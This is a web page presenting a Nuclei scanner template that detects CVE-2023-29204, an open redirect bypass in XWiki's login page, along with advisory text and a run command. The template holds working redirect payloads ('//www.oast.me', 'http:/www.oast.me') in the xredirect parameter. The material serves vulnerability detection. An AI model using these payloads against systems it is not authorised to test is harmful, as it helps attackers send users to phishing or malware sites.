Skip to content

XWiki - Open Redirect

ID: CVE-2023-29204

Severity: medium

Author: ritikchaddha

Tags: cve,cve2023,xwiki,redirect

XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as //mydomain.com (i.e. omitting the http:). It was also possible to bypass it when using URL such as http:/mydomain.com. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.

id: CVE-2023-29204
info:
name: XWiki - Open Redirect
author: ritikchaddha
severity: medium
description: |
XWiki Commons are technical libraries common to several other top level XWiki projects. It is possible to bypass the existing security measures put in place to avoid open redirect by using a redirect such as `//mydomain.com` (i.e. omitting the `http:`). It was also possible to bypass it when using URL such as `http:/mydomain.com`. The problem has been patched on XWiki 13.10.10, 14.4.4 and 14.8RC1.
impact: |
An attacker can redirect users to malicious websites, leading to phishing attacks or malware downloads.
remediation: |
Implement proper input validation and sanitize user-controlled input to prevent open redirect vulnerabilities.
reference:
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-xwph-x6xj-wggv
- https://jira.xwiki.org/browse/XWIKI-10309
- https://jira.xwiki.org/browse/XWIKI-19994
- https://nvd.nist.gov/vuln/detail/CVE-2023-29204
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-29204
cwe-id: CWE-601
epss-score: 0.00094
epss-percentile: 0.39237
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2023,xwiki,redirect
http:
- method: GET
path:
- "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//www.oast.me"
- "{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=http:/www.oast.me"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022100ca1d8c88904db22cb7b66834218945c36c324b241c4017c75f018871ff98b64202202e0a6a546684c06d64ef800ed426248373eb15ea7c15d4256f9bb4905a1b70aa:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-29204.yaml"

View on Github